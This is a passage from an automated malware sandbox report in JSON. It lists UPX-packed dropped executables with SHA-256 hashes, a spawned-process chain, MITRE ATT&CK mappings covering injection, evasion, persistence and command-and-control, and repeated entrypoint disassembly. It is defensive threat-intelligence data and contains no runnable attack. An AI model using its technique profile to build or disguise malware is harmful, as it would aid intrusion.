"type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "lnnjjb.exe", "file_size": 345095, "sha256": "680d8ea615ad9d11f7ff2446403f1925d8a364de1f7be51b1a524e3b7826776b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "jfrfbtr.exe", "file_size": 345084, "sha256": "417a99cfa9047c859440fe39342ff85f9a3d492e2ff3e55062492a753450b762", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "bpbtb.exe", "file_size": 345066, "sha256": "dad3b6d67380c2e1e27f79e1d62fbd6d559280f2a0d8173a26bc769920e9d929", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pjbbvdd.exe", "file_size": 345047, "sha256": "b5670195d3e6160f88e73938384cd37f3db826a3951a840a8f5b4734d4530e28", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "pdnrb.exe", "file_size": 345033, "sha256": "0a524abe4a1d647b34d93930b9c67f37958e550f2544ab69d1f977bdafe12fef", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "hpdnldp.exe", "file_size": 345017, "sha256": "e0069b94786691562b143b90360e2706cf2894560ca3013ae3193942cbb91db8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xlrxxtf.exe", "file_size": 344998, "sha256": "bfcf2c200c1e9f359dafad0b0efb27dc730a3182dd7289f8cd022f105024567d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rvhlvt.exe", "file_size": 344979, "sha256": "1fb29ecba776b4389f827f453e7d3a0d1ed0c1c8c9200eee40a8b10f36bb4891", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "vxxfjr.exe", "file_size": 344961, "sha256": "1d9a97d416d585ef7a742d84bb6ee0ce1ee7676e62def442f22768f43275808b", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dnxpf.exe", "file_size": 344949, "sha256": "8ba2d9d2bc48523467f6d24bde8ee80ad9df34d988e62e8486da62e44a4ef9f5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005860", "name": "604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe", "normalized_path": "C:\\604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6.exe", "sha256": "604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6"}, {"uid": "00000000-00005812", "parentuid": "00000000-00005860", "name": "0004664.exe", "normalized_path": "c:\\0004664.exe", "sha256": "4ff1fc08920d6900b80b0260bdd1abe4817adc88ec59c01d5b038dbc1be930d7"}, {"uid": "00000000-00006068", "parentuid": "00000000-00005812", "name": "4060800.exe", "normalized_path": "c:\\4060800.exe", "sha256": "2aadbdbbefb484f63dfd7ccae9a8fae35eb322b8282544f92a627206f8d00f86"}, {"uid": "00000000-00006112", "parentuid": "00000000-00006068", "name": "482642.exe", "normalized_path": "c:\\482642.exe", "sha256": "2ed78f748a267c4703e2ddc3bdf19fb0956f06e33408bf02b75f54ce884df240"}, {"uid": "00000000-00005940", "parentuid": "00000000-00006112", "name": "lthxxd.exe", "normalized_path": "c:\\lthxxd.exe", "sha256": "88e5317d2bbeaa68228d8f93269a4bbbb82941c71167e233f915cefeaa8f4866"}, {"uid": "00000000-00005952", "parentuid": "00000000-00005940", "name": "bbpbfhd.exe", "normalized_path": "c:\\bbpbfhd.exe", "sha256": "f55c47486e7a75061296dc1d864c378cf7e9c1fa4ff73366bf83199fabe753a1"}, {"uid": "00000000-00005756", "parentuid": "00000000-00005952", "name": "ntpbdh.exe", "normalized_path": "c:\\ntpbdh.exe", "sha256": "b19d31b70c736f2b82918f835ae972a8648f89231d8ba405c163c1abcc3a44c7"}, {"uid": "00000000-00005464", "parentuid": "00000000-00005756", "name": "rrjxnjh.exe", "normalized_path": "c:\\rrjxnjh.exe", "sha256": "3efe0658d60363c65806c9a38e1fec79a31cda6fb6e7c2db973f373ae31c74c0"}, {"uid": "00000000-00006136", "parentuid": "00000000-00005464", "name": "004422.exe", "normalized_path": "c:\\004422.exe", "sha256": "9957505aa82e234f76cc554332423aed2791ceaaeeef5f69faaa71d64fc73a5b"}, {"uid": "00000000-00005992", "parentuid": "00000000-00006136", "name": "rlrbxrl.exe", "normalized_path": "c:\\rlrbxrl.exe", "sha256": "2222f2c4c6b1d5a664cdea55ccdb97f59f703a70fed60e7cd5e35db098dbe92a"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tfpfbjl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjvxrf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pttxvt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lnnjjb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"jfrfbtr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bpbtb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pjbbvdd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pdnrb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hpdnldp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xlrxxtf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rvhlvt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vxxfjr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dnxpf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"drbdjh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lhrhrpt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rtrnhfh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vhftp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lxhhl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fnrxft.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dpndv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rxfxxnn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xprhl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"npjbvrb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"220404.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"604216b59f6785b80a8a58229e2743cf659584a2378b30111e168cbe7c2bd3a6\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"tfpfbjl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rjvxrf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pttxvt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lnnjjb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"jfrfbtr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bpbtb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pjbbvdd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pdnrb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hpdnldp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xlrxxtf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rvhlvt.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vxxfjr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n 